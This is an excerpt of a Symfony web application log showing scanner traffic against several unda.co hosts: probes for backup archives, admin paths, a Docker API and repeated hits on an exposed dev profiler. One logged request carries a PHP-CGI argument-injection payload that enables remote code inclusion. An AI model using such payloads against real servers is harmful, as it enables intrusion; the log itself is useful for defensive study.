  3661. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /discord.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /discord.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3662. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /department.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /department.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3663. [2025-12-18 07:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /documentation.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /documentation.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3664. [2025-12-18 07:40:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sentry.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sentry.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3665. [2025-12-18 07:51:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3666. [2025-12-18 07:51:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput","method":"POST"} []
  3667. [2025-12-18 07:53:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3668. [2025-12-18 07:54:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /containers/json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /containers/json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3669. [2025-12-18 08:03:19] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3670. [2025-12-18 08:03:21] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3671. [2025-12-18 08:03:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/" (from "http://web.unda.co/wp-admin/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/\" (from \"http://web.unda.co/wp-admin/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3672. [2025-12-18 08:03:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/" (from "http://web.unda.co/administrator/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/\" (from \"http://web.unda.co/administrator/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3673. [2025-12-18 08:03:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /user/login" (from "http://web.unda.co/user/login")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /user/login\" (from \"http://web.unda.co/user/login\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3674. [2025-12-18 08:03:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://web.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://web.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3675. [2025-12-18 08:03:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login" (from "http://web.unda.co/login")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" (from \"http://web.unda.co/login\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3676. [2025-12-18 08:03:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /register" (from "http://web.unda.co/register")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /register\" (from \"http://web.unda.co/register\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3677. [2025-12-18 08:03:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin" (from "http://web.unda.co/admin")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin\" (from \"http://web.unda.co/admin\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3678. [2025-12-18 08:03:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login" (from "http://web.unda.co/login")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" (from \"http://web.unda.co/login\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3679. [2025-12-18 08:05:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e252a6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e252a6?panel=dump","method":"GET"} []
  3680. [2025-12-18 08:05:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  3681. [2025-12-18 08:09:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=config","method":"GET"} []
  3682. [2025-12-18 08:09:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3683. [2025-12-18 08:11:26] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3684. [2025-12-18 08:16:08] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  3685. [2025-12-18 08:16:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  3686. [2025-12-18 08:20:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee3c72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee3c72?panel=twig","method":"GET"} []
  3687. [2025-12-18 08:20:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3688. [2025-12-18 08:24:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9b204","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b9b204?panel=validator","method":"GET"} []
  3689. [2025-12-18 08:24:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  3690. [2025-12-18 08:25:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=validator","method":"GET"} []
  3691. [2025-12-18 08:25:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  3692. [2025-12-18 08:25:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3693. [2025-12-18 08:27:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"206850","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/206850","method":"GET"} []
  3694. [2025-12-18 08:27:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3695. [2025-12-18 08:31:42] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3696. [2025-12-18 08:34:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=events","method":"GET"} []
  3697. [2025-12-18 08:34:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  3698. [2025-12-18 08:43:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3699. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3700. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3701. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3702. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3703. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3704. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3705. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3706. [2025-12-18 08:49:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3707. [2025-12-18 08:49:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3708. [2025-12-18 08:50:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=time","method":"GET"} []
  3709. [2025-12-18 08:50:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3710. [2025-12-18 09:00:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3711. [2025-12-18 09:02:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3712. [2025-12-18 09:04:29] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"132e26","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/132e26/search/results?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
  3713. [2025-12-18 09:04:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
  3714. [2025-12-18 09:06:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"27f092","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/27f092?panel=form","method":"GET"} []
  3715. [2025-12-18 09:06:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  3716. [2025-12-18 09:12:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3717. [2025-12-18 09:13:36] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  3718. [2025-12-18 09:13:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3719. [2025-12-18 09:13:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3720. [2025-12-18 09:13:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3721. [2025-12-18 09:13:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  3722. [2025-12-18 09:13:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  3723. [2025-12-18 09:13:36] security.DEBUG: Calling Authentication entry point. [] []
  3724. [2025-12-18 09:13:37] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  3725. [2025-12-18 09:13:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  3726. [2025-12-18 09:13:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3727. [2025-12-18 09:13:37] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  3728. [2025-12-18 09:13:37] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  3729. [2025-12-18 09:13:37] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  3730. [2025-12-18 09:13:37] security.DEBUG: Calling Authentication entry point. [] []
  3731. [2025-12-18 09:13:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
